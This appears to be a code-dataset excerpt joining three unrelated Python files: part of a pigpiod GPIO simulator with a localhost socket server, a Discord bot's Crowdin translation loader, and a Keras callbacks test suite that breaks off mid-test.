print('Client {}: {}'.format(self.addr, e))
break
except IOError:
break
self.close()
def close(self):
if self.sock:
self.sock.close()
self.sock = None
print('Closed connection from {}'.format(self.addr))
self.app.removeClient(self)
def processCommand(self, cmd, p1, p2, p3, extension):
if cmd == pigpio._PI_CMD_BR1:
res = 0
for io in reversed(range(32)):
gpio = self.app.controller.getIO(io, False)
if gpio:
res = (res << 1) + (1 if gpio.value else 0)
self.sendResponse(res)
elif cmd == pigpio._PI_CMD_NOIB:
self.sendResponse(self.handle)
elif cmd == pigpio._PI_CMD_MODES:
gpio = self.app.controller.getIO(p1)
if p2 == pigpio.INPUT: mode = 'input'
elif p2 == pigpio.OUTPUT: mode = 'output'
else:
raise ClientException('unsupported mode {}'.format(p2))
gpio.set_mode(mode)
self.sendResponse()
elif cmd == pigpio._PI_CMD_NC: # stops notification on handle p1
self.sendResponse()
elif cmd == pigpio._PI_CMD_NB:
for io in reversed(range(32)):
gpio = self.app.controller.getIO(io, False)
if gpio:
gpio.setup_callback(p1, (p2 & (1 << io)) > 0)
self.sendResponse()
elif cmd == pigpio._PI_CMD_PUD:
gpio = self.app.controller.getIO(p1)
gpio.set_pullup(p2)
self.sendResponse()
elif cmd == pigpio._PI_CMD_FG:
self.sendResponse()
elif cmd == pigpio._PI_CMD_READ:
gpio = self.app.controller.getIO(p1)
self.sendResponse(1 if gpio.value else 0)
elif cmd == pigpio._PI_CMD_WRITE:
gpio = self.app.controller.getIO(p1)
gpio.set_value(p2 == pigpio.HIGH)
self.sendResponse()
elif cmd == pigpio._PI_CMD_PRS:
gpio = self.app.controller.getIO(p1)
gpio.set_pwm_range(p2)
self.sendResponse(gpio.pwmRange)
elif cmd == pigpio._PI_CMD_PWM:
gpio = self.app.controller.getIO(p1)
gpio.set_pwm_dutycycle(p2)
self.sendResponse()
elif cmd == pigpio._PI_CMD_PFS:
gpio = self.app.controller.getIO(p1)
gpio.set_pwm_frequency(p2)
self.sendResponse(gpio.pwmFrequency)
else:
raise ClientException('unknown command: {}'.format(cmd))
def sendResponse(self, res = 0):
with self.lock:
self.sock.send(struct.pack('4I', 0, 0, 0, res))
def sendEvent(self, flags, level):
with self.lock:
ticks = int(time.time() * 1000000) % (1 << 32)
self.sock.send(struct.pack('HHII', self.eventSequence, flags, ticks, level))
#print('sent event: {}, {}, {}, {}'.format(self.eventSequence, hex(flags), ticks, hex(level)))
self.eventSequence = (self.eventSequence + 1) % (1 << 16)
class GPIOPin:
def __init__(self, app, widget):
self.app = app
self.widget = widget
self.name = widget.name
self.pin = widget.pin
self.io = widget.io
self.mode = 'input'
self.bit = 1 << int(self.io)
self.pullup = pigpio.PUD_OFF
self.value = False
self.pwmRange = 255
self.pwmFrequency = 0
self.pwmDutycycle = 0
self.handles = []
if self.app.simConfig.has_option('labels', self.io):
widget.name = self.app.simConfig.get('labels', self.io)
self.update()
def add_handle(self, handle):
if handle not in self.handles:
self.handles.append(handle)
def remove_handle(self, handle):
if handle in self.handles:
self.handles.remove(handle)
def set_mode(self, mode):
if mode != self.mode:
self.mode = mode
if mode == 'input' and not isinstance(self.value, bool):
self.value = False
self.update()
print('GPIO {} mode set to {}'.format(self.io, self.mode))
def set_pullup(self, pullup):
self.pullup = pullup
self.update()
def set_value(self, value):
if value != self.value:
self.value = value
self.update()
print('GPIO {} value set to {}'.format(self.io, 'High' if self.value else 'Low'))
for handle in self.handles:
client = self.app.clientForHandle(handle)
if client:
client.sendEvent(0, self.bit if self.value else 0)
def toggle_value(self):
if isinstance(self.value, bool):
self.set_value(not self.value)
def setup_callback(self, handle, on):
if on:
self.add_handle(handle)
else:
self.remove_handle(handle)
print('GPIO {} callback turned {} for {}'.format(self.io, 'on' if handle in self.handles else 'off', handle))
def set_pwm_range(self, range):
self.pwmRange = range
self.pwmDutycycle = min(self.pwmDutycycle, self.pwmRange)
self.value = None
self.update()
print('GPIO {} PWM range set to {}'.format(self.io, self.pwmRange))
def set_pwm_dutycycle(self, dutycycle):
self.pwmDutycycle = max(min(dutycycle, self.pwmRange), 0)
self.set_mode('output')
self.value = None
self.update()
print('GPIO {} PWM dutycycle set to {}'.format(self.io, self.pwmDutycycle))
def set_pwm_frequency(self, frequency):
self.pwmFrequency = frequency
self.set_mode('output')
self.value = None
self.update()
print('GPIO {} PWM frequency set to {}'.format(self.io, self.pwmFrequency))
@mainthread
def update(self):
self.widget.mode = self.mode
if self.mode == 'input':
if self.pullup == pigpio.PUD_OFF:
pud = 'No pullup'
elif self.pullup == pigpio.PUD_UP:
pud = 'Pullup'
elif self.pullup == pigpio.PUD_OFF:
pud = 'Pulldown'
self.widget.display_value = '{}/{}'.format(pud, 'High' if self.value else 'Low')
else:
if isinstance(self.value, bool):
self.widget.display_value = 'High' if self.value else 'Low'
else:
self.widget.display_value = 'PWM {:0.0f}%/{}Hz'.format(100 * self.pwmDutycycle / self.pwmRange, self.pwmFrequency)
class pigpioController(GridLayout):
def __init__(self, app):
super().__init__()
self.app = app
self.ios = {}
for c in self.children:
if hasattr(c, 'mode'):
gpio = GPIOPin(app, c)
self.ios[c.io] = gpio
def toggleInput(self, widget):
gpio = self.getIO(widget.io)
if gpio:
gpio.toggle_value()
def getIO(self, io, raiseException = True):
io = str(io)
if io not in self.ios.keys():
if raiseException:
raise ClientException('unknown GPIO {}'.format(io))
return None
else:
return self.ios[io]
class pigpioApp(App):
title = 'pigpiod Simulator'
def __init__(self):
super().__init__()
self.serverThread = None
self.exitEvent = Event()
self.clients = []
self.controller = None
self.simConfig = configparser.ConfigParser(interpolation = None)
self.simConfig.optionxform = str # preserve option case
self.simConfig.clear()
if len(sys.argv) > 1:
self.simConfig.read(sys.argv[1])
def build(self):
Builder.load_string(SCREEN)
self.serverThread = Thread(target = self.serverLoop, name = 'Server', daemon = True)
self.serverThread.start()
self.controller = pigpioController(self)
return self.controller
def serverLoop(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('127.0.0.1', 8888))
s.listen(2)
print('Waiting for connection...')
while not self.exitEvent.is_set():
sock, addr = s.accept()
print('Accepted connection from {}'.format(addr))
client = pigpioClient(self, sock, addr)
self.clients.append(client)
s.close()
for client in self.clients:
client.close()
self.removeClient(client)
def removeClient(self, client):
if client in self.clients:
self.clients.remove(client)
def clientForHandle(self, handle):
return next(iter([c for c in self.clients if c.handle == handle]), None)
if __name__ == '__main__':
app = pigpioApp()
try:
app.run()
except KeyboardInterrupt:
pass
|
Translator.py
|
import asyncio
import hashlib
import json
import threading
import urllib.parse
import requests
from parsimonious import ParseError, VisitationError
from pyseeyou import format
from Util import Configuration, GearbotLogging, Emoji, Utils
LANGS = dict()
LANG_NAMES = dict(en_US= "English")
LANG_CODES = dict(English="en_US")
BOT = None
untranlatable = {"Sets a playing/streaming/listening/watching status", "Reloads all server configs from disk", "Reset the cache", "Make a role pingable for announcements", "Pulls from github so an upgrade can be performed without full restart", ''}
async def initialize(bot_in):
global BOT
BOT = bot_in
await load_codes()
await update_all()
for lang in LANG_CODES.values():
load_translations(lang)
def load_translations(lang):
LANGS[lang] = Utils.fetch_from_disk(f"lang/{lang}")
def translate(key, location, **kwargs):
lid = None
if location is not None:
if hasattr(location, "guild"):
location = location.guild
if location is not None and hasattr(location, "id"):
lid = location.id
else:
lid = location
if lid is None:
lang_key = "en_US"
else:
lang_key = Configuration.get_var(lid, "GENERAL", "LANG")
translated = key
if key not in LANGS[lang_key]:
if key not in untranlatable:
BOT.loop.create_task(tranlator_log('WARNING', f'Untranslatable string detected: {key}\n'))
untranlatable.add(key)
return key if key not in LANGS["en_US"] else format(LANGS['en_US'][key], kwargs, 'en_US')
try:
translated = format(LANGS[lang_key][key], kwargs, lang_key)
except (KeyError, ValueError, ParseError, VisitationError) as ex:
BOT.loop.create_task(tranlator_log('NO', f'Corrupt translation detected!\n**Lang code:** {lang_key}\n**Translation key:** {key}\n```\n{LANGS[lang_key][key]}```'))
GearbotLogging.exception("Corrupt translation", ex)
if key in LANGS["en_US"].keys():
try:
translated = format(LANGS['en_US'][key], kwargs, 'en_US')
except (KeyError, ValueError, ParseError, VisitationError) as ex:
BOT.loop.create_task(tranlator_log('NO', f'Corrupt English source string detected!\n**Translation key:** {key}\n```\n{LANGS["en_US"][key]}```'))
GearbotLogging.exception('Corrupt translation', ex)
return translated
def translate_by_code(key, code, **kwargs):
if key not in LANGS[code]:
return key
return format(LANGS[code][key], kwargs, code)
async def upload():
t_info = Configuration.get_master_var("TRANSLATIONS", dict(SOURCE="SITE", CHANNEL=0, KEY="", LOGIN="", WEBROOT=""))
if t_info["SOURCE"] == "DISABLED": return
new = hashlib.md5(open(f"lang/en_US.json", 'rb').read()).hexdigest()
old = Configuration.get_persistent_var('lang_hash', '')
if old == new:
return
Configuration.set_persistent_var('lang_hash', new)
message = await tranlator_log('REFRESH', 'Uploading translation file')
t = threading.Thread(target=upload_file)
t.start()
while t.is_alive():
await asyncio.sleep(1)
await message.edit(content=f"{Emoji.get_chat_emoji('YES')} Translations file has been uploaded")
await update_all()
def upload_file():
data = {'files[/bot/commands.json]': open('lang/en_US.json', 'r')}
crowdin_data = Configuration.get_master_var("TRANSLATIONS", dict(SOURCE="SITE", CHANNEL=0, KEY= "", LOGIN="", WEBROOT=""))
reply = requests.post(f"https://api.crowdin.com/api/project/gearbot/update-file?login={crowdin_data['LOGIN']}&account-key={crowdin_data['KEY']}&json", files=data)
GearbotLogging.info(reply)
async def load_codes():
t_info = Configuration.get_master_var("TRANSLATIONS", dict(SOURCE="SITE", CHANNEL=0, KEY= "", LOGIN="", WEBROOT=""))
if t_info["SOURCE"] == "DISABLED": return
GearbotLogging.info(f"Getting all translations from {t_info['SOURCE']}...")
# set the links for where to get stuff
if t_info["SOURCE"] == "CROWDIN":
list_link = f"https://api.crowdin.com/api/project/gearbot/status?login={t_info['LOGIN']}&account-key={t_info['KEY']}&json"
else:
list_link = "https://gearbot.rocks/lang/langs.json"
async with BOT.aiosession.get(list_link) as resp:
info = await resp.json()
l = list()
for lang in info:
l.append(dict(name=lang["name"], code=lang["code"]))
LANG_NAMES[lang["code"]] = lang["name"]
LANG_CODES[lang["name"]] = lang["code"]
Utils.save_to_disk("lang/langs", l)
async def update_all():
futures = [update_lang(lang) for lang in LANG_CODES.values() if lang != "en_US"]
for chunk in Utils.chunks(futures, 20):
await asyncio.gather(*chunk)
async def update_lang(lang, retry=True):
t_info = Configuration.get_master_var("TRANSLATIONS")
if t_info["SOURCE"] == "DISABLED": return
if t_info["SOURCE"] == "CROWDIN":
download_link = f"https://api.crowdin.com/api/project/gearbot/export-file?login={t_info['LOGIN']}&account-key={t_info['KEY']}&json&file={urllib.parse.quote('/bot/commands.json', safe='')}&language={lang}"
else:
download_link = f"https://gearbot.rocks/lang/{lang}.json"
GearbotLogging.info(f"Updating {lang} ({LANG_NAMES[lang]}) file...")
async with BOT.aiosession.get(download_link) as response:
content = await response.text()
content = json.loads(content)
if "success" in content:
if retry:
GearbotLogging.warn(f"Failed to update {lang} ({LANG_NAMES[lang]}), trying again in 3 seconds")
await asyncio.sleep(3)
await update_lang(lang, False)
else:
await tranlator_log('NO', f"Failed to update {lang} ({LANG_NAMES[lang]}) from {t_info['SOURCE']}")
Utils.save_to_disk(f'lang/{lang}', content)
LANGS[lang] = content
GearbotLogging.info(f"Updated {lang} ({LANG_NAMES[lang]})!")
async def tranlator_log(emoji, message, embed=None):
m = f'{Emoji.get_chat_emoji(emoji)} {message}'
return await get_translator_log_channel()(m, embed=embed)
def get_translator_log_channel():
crowdin = Configuration.get_master_var("TRANSLATIONS", dict(SOURCE="SITE", CHANNEL=0, KEY= "", LOGIN="", WEBROOT=""))
channel = BOT.get_channel(crowdin["CHANNEL"]) if crowdin is not None else None
return channel.send if channel is not None else GearbotLogging.bot_log
|
callbacks_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras callbacks."""
import tensorflow.compat.v2 as tf
import collections
import csv
import json
import os
import re
import shutil
import sys
import threading
import time
import unittest
from unittest import mock
from absl.testing import parameterized
import numpy as np
import keras
from keras import keras_parameterized
from keras import testing_utils
from keras.callbacks import BackupAndRestore
from keras.engine import sequential
from keras.layers import Activation
from keras.layers import Dense
from keras.optimizer_v2 import gradient_descent
from keras.optimizer_v2 import learning_rate_schedule
from keras.utils import np_utils
from tensorflow.python.platform import tf_logging as logging
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
try:
import requests # pylint:disable=g-import-not-at-top
except ImportError:
requests = None
TRAIN_SAMPLES = 10
TEST_SAMPLES = 10
NUM_CLASSES = 2
INPUT_DIM = 3
NUM_HIDDEN = 5
BATCH_SIZE = 5
CALLBACK_HOOKS = [
'on_batch_begin', 'on_batch_end', 'on_epoch_begin', 'on_epoch_end',
'on_predict_batch_begin', 'on_predict_batch_end', 'on_predict_begin',
'on_predict_end', 'on_test_batch_begin', 'on_test_batch_end',
'on_test_begin', 'on_test_end', 'on_train_batch_begin',
'on_train_batch_end', 'on_train_begin', 'on_train_end'
]
class Counter(keras.callbacks.Callback):
"""Counts the number of times each callback method was run.
Attributes:
method_counts: dict. Contains the counts of time each callback method was
run.
"""
def __init__(self):
self.method_counts = collections.defaultdict(int)
for method_name in CALLBACK_HOOKS:
setattr(self, method_name,
self.wrap_with_counts(method_name, getattr(self, method_name)))
def wrap_with_counts(self, method_name, method):
def _call_and_count(*args, **kwargs):
self.method_counts[method_name] += 1
return method(*args, **kwargs)
return _call_and_count
class CallAllHooks(keras.callbacks.Callback):
"""A callback that calls self._run for all hooks"""
def __init__(self):
for method_name in CALLBACK_HOOKS:
setattr(self, method_name, self._run)
def _run(self, *args, logs=None):
raise NotImplementedError
def _get_numpy():
return np.ones((10, 10)), np.ones((10, 1))
def _get_sequence():
class MySequence(keras.utils.data_utils.Sequence):
def __getitem__(self, _):
return np.ones((2, 10)), np.ones((2, 1))
def __len__(self):
return 5
return MySequence(), None
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
class CallbackCountsTest(keras_parameterized.TestCase):
def _check_counts(self, counter, expected_counts):
"""Checks that the counts registered by `counter` are those expected."""
for method_name, expected_count in expected_counts.items():
self.assertEqual(
counter.method_counts[method_name],
expected_count,
msg='For method {}: expected {}, got: {}'.format(
method_name, expected_count, counter.method_counts[method_name]))
def _get_model(self):
layers = [
keras.layers.Dense(10, activation='relu'),
keras.layers.Dense(1, activation='sigmoid')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
tf.compat.v1.train.AdamOptimizer(0.001),
'binary_crossentropy',
run_eagerly=testing_utils.should_run_eagerly())
return model
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_fit(self, data):
if not tf.executing_eagerly():
self.skipTest('Behavior changed in v2.')
x, y = data
val_x, val_y = np.ones((4, 10)), np.ones((4, 1))
model = self._get_model()
counter = Counter()
model.fit(
x,
y,
validation_data=(val_x, val_y),
batch_size=2,
steps_per_epoch=5,
epochs=5,
callbacks=[counter])
self._check_counts(
counter, {
'on_batch_begin': 25,
'on_batch_end': 25,
'on_epoch_begin': 5,
'on_epoch_end': 5,
'on_predict_batch_begin': 0,
'on_predict_batch_end': 0,
'on_predict_begin': 0,
'on_predict_end': 0,
'on_test_batch_begin': 10,
'on_test_batch_end': 10,
'on_test_begin': 5,
'on_test_end': 5,
'on_train_batch_begin': 25,
'on_train_batch_end': 25,
'on_train_begin': 1,
'on_train_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_evaluate(self, data):
x, y = data
is_sequence = isinstance(x, keras.utils.data_utils.Sequence)
model = self._get_model()
counter = Counter()
model.evaluate(
x,
y,
batch_size=2 if not is_sequence else None,
steps=5 if is_sequence else None,
callbacks=[counter])
self._check_counts(
counter, {
'on_test_batch_begin': 5,
'on_test_batch_end': 5,
'on_test_begin': 1,
'on_test_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_predict(self, data):
x = data[0]
is_sequence = isinstance(x, keras.utils.data_utils.Sequence)
model = self._get_model()
counter = Counter()
model.predict(
x,
batch_size=2 if not is_sequence else None,
steps=5 if is_sequence else None,
callbacks=[counter])
self._check_counts(
counter, {
'on_predict_batch_begin': 5,
'on_predict_batch_end': 5,
'on_predict_begin': 1,
'on_predict_end': 1
})
def test_callback_list_methods(self):
counter = Counter()
callback_list = keras.callbacks.CallbackList([counter])
batch = 0
callback_list.on_test_batch_begin(batch)
callback_list.on_test_batch_end(batch)
callback_list.on_predict_batch_begin(batch)
callback_list.on_predict_batch_end(batch)
self._check_counts(
counter, {
'on_test_batch_begin': 1,
'on_test_batch_end': 1,
'on_predict_batch_begin': 1,
'on_predict_batch_end': 1
})
class KerasCallbacksTest(keras_parameterized.TestCase):
def _get_model(self, input_shape=None, additional_metrics=None):
additional_metrics = additional_metrics or []
layers = [
keras.layers.Dense(3, activation='relu'),
keras.layers.Dense(2, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=input_shape)
model.compile(
loss='mse',
optimizer='rmsprop',
metrics=[keras.metrics.CategoricalAccuracy(name='my_acc')] +
additional_metrics,
run_eagerly=testing_utils.should_run_eagerly())
return model
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging(self):
model = self._get_model(input_shape=(3,))
x = tf.ones((200, 3))
y = tf.zeros((200, 2))
dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegex(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_with_stateful_metrics(self):
class AddAllOnes(keras.metrics.Metric):
"""A simple metric that adds all the one's in `y_true`."""
def __init__(self, name='add_all_ones', **kwargs):
super(AddAllOnes, self).__init__(name=name, **kwargs)
self.total = self.add_weight(name='total', initializer='zeros')
def update_state(self, y_true, y_pred, sample_weight=None):
self.total.assign_add(
tf.cast(tf.reduce_sum(y_true), dtype=tf.float32))
def result(self):
return self.total
x_train = np.array([[0, 1, 0, 1, 0, 1, 0, 1]] * 8).astype(float)
y_train = np.array([[1, 0], [0, 0], [1, 1], [1, 0], [0, 1], [1, 0], [1, 0],
[0, 0]])
# There are 7 ones in total in `y_train` after two batches.
expected_log = r'(.*- loss:.*- my_acc:.*- add_all_ones: 7.0000)+'
with self.captureWritesToStream(sys.stdout) as printed:
model = self._get_model(
input_shape=(8,), additional_metrics=[AddAllOnes()])
model.fit(x_train, y_train, verbose=1, batch_size=4, shuffle=False)
self.assertRegex(printed.contents(), expected_log)
# When not executing eagerly, `model.evaluate` does not have the metrics
# results printed.
if tf.executing_eagerly():
with self.captureWritesToStream(sys.stdout) as printed:
model = self._get_model(
input_shape=(8,), additional_metrics=[AddAllOnes()])
model.evaluate(x_train, y_train, verbose=1, batch_size=4)
self.assertRegex(printed.contents(), expected_log)
@keras_parameterized.run_all_keras_modes
def test_trivial_backup_restore(self):
if testing_utils.should_run_eagerly():
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
cbk = BackupAndRestore(self.get_temp_dir())
model.fit(np.ones((10, 1)), np.ones((10, 1)), epochs=0, callbacks=[cbk])
def test_backup_restore_train_counter(self):
if not tf.compat.v1.executing_eagerly():
self.skipTest('BackupAndRestore only available when execution is enabled')
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
cbk = BackupAndRestore(self.get_temp_dir())
class InterruptingCallback(keras.callbacks.Callback):
"""A callback to intentionally introduce interruption to training."""
def on_epoch_end(self, epoch, log=None):
logging.info(f'counter: {model._train_counter}')
if epoch == 5 or epoch == 12:
raise RuntimeError('Interruption')
log_dir = self.get_temp_dir()
# The following asserts that the train counter is fault tolerant.
self.assertEqual(model._train_counter.numpy(), 0)
try:
model.fit(np.ones((10, 1)), np.ones((10, 1)), epochs=20,
callbacks=[cbk, InterruptingCallback()])
except RuntimeError:
pass
self.assertEqual(model._train_counter.numpy(), 6)
try:
model.fit(np.ones((10, 1)), np.ones((10, 1)), epochs=20,
callbacks=[cbk, InterruptingCallback()])
except RuntimeError:
pass
self.assertEqual(model._train_counter.numpy(), 13)
@keras_parameterized.run_all_keras_modes
def test_callback_warning(self):
class SleepCallback(keras.callbacks.Callback):
def on_train_batch_end(self, batch, logs=None):
time.sleep(0.1)
model = sequential.Sequential()
model.add(keras.layers.Dense(1))
model.compile(
'sgd',
loss='mse',
run_eagerly=testing_utils.should_run_eagerly())
warning_messages = []
def warning(msg):
warning_messages.append(msg)
with tf.compat.v1.test.mock.patch.object(logging, 'warning', warning):
model.fit(
np.ones((16, 1), 'float32'),
np.ones((16, 1), 'float32'),
batch_size=3,
epochs=1,
callbacks=[SleepCallback()])
warning_msg = ('Callback method `on_train_batch_end` is slow compared '
'to the batch time')
self.assertIn(warning_msg, '\n'.join(warning_messages))
@keras_parameterized.run_all_keras_modes
def test_default_callbacks_no_warning(self):
# Test that without the callback no warning is raised
model = sequential.Sequential()
model.add(keras.layers.Dense(1))
model.compile(
'sgd',
loss='mse',
run_eagerly=testing_utils.should_run_eagerly())
warning_messages = []
def warning(msg):
warning_messages.append(msg)
with tf.compat.v1.test.mock.patch.object(logging, 'warning', warning):
model.fit(
np.ones((16, 1), 'float32'),
np.ones((16, 1), 'float32'),
batch_size=3,
epochs=1)
self.assertListEqual(warning_messages, [])
@keras_parameterized.run_with_all_model_types(exclude_models='functional')
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_deferred_model_build(self):
model = self._get_model()
self.assertFalse(model.built)
x = tf.ones((200, 3))
y = tf.zeros((200, 2))
dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegex(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_validation_data(self):
model = self._get_model(input_shape=(3,))
x = tf.ones((50, 3))
y = tf.zeros((50, 2))
training_dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10)
val_dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*5/5.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(training_dataset, epochs=2, validation_data=val_dataset)
self.assertRegex(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_progbar_logging_validation_split(self):
model = self._get_model(input_shape=(3,))
x = np.ones((100, 3))
y = np.zeros((100, 2))
expected_log = (
r'(?s).*1/2.*8/8.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:'
r'.*2/2.*8/8.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*')
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(x, y, batch_size=10, epochs=2, validation_split=0.2)
self.assertRegex(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_progbar_logging_training_validation(self):
model = self._get_model(input_shape=(2,))
def generator():
for _ in range(100):
yield [1, 1], 1
training = tf.data.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2) \
.repeat()
validation = tf.data.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2)
expected_log = (
r'(?s).*1/2.*20/20.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:'
r'.*2/2.*20/20.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*')
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(
x=training, validation_data=validation, epochs=2, steps_per_epoch=20)
self.assertRegex(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_progbar_logging_with_dataset_and_partial_batch(self):
model = self._get_model(input_shape=(2,))
def generator():
# Have a partial batch at the end.
for _ in range(9):
yield np.random.random(2), 1
training = tf.data.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2)
validation = tf.data.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2)
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(x=training, validation_data=validation)
# Make sure the value of val_ metrics are not zeros.
log_content = printed.contents()
val_loss = re.findall(r'val_loss: (\d\.\d+)', log_content)
self.assertLen(val_loss, 1)
self.assertGreater(float(val_loss[0]), 0.0)
@keras_parameterized.run_with_all_model_types
def test_ModelCheckpoint(self):
if h5py is None:
return # Skip test if models cannot be saved.
model_type = testing_utils.get_model_type()
if model_type == 'subclass':
return # Skip test since subclassed models cannot be saved in .h5 format.
if not tf.__internal__.tf2.enabled():
self.skipTest('Checkpoint callback only available in v2.')
layers = [
keras.layers.Dense(NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'),
keras.layers.Dense(NUM_CLASSES, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(3,))
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'checkpoint.h5')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
# Case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case 2
mode = 'min'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case 3
mode = 'max'
monitor = 'val_acc'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case 4
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case 5: metric not available.
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor='unknown',
save_best_only=True)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# File won't be written.
assert not os.path.exists(filepath)
# Case 6
save_best_only = False
period = 2
mode = 'auto'
filepath = os.path.join(temp_dir, 'checkpoint.{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
period=period)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=4,
verbose=1)
assert os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=4))
os.remove(filepath.format(epoch=2))
os.remove(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=3))
# Invalid use: this will raise a warning but not an Exception.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode='unknown')
# Case 7: `ModelCheckpoint` with a combination of `save_freq` and `period`.
# Though `period` is deprecated, we're testing it for
# backward-compatibility.
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath, monitor=monitor, mode=mode, save_freq='epoch', period=5)
]
assert not os.path.exists(filepath.format(epoch=0))
assert not os.path.exists(filepath.format(epoch=5))
model.fit(
x_train,
y_train,
batch_size=2,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=10,
verbose=1)
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=2))
assert not os.path.exists(filepath.format(epoch=3))
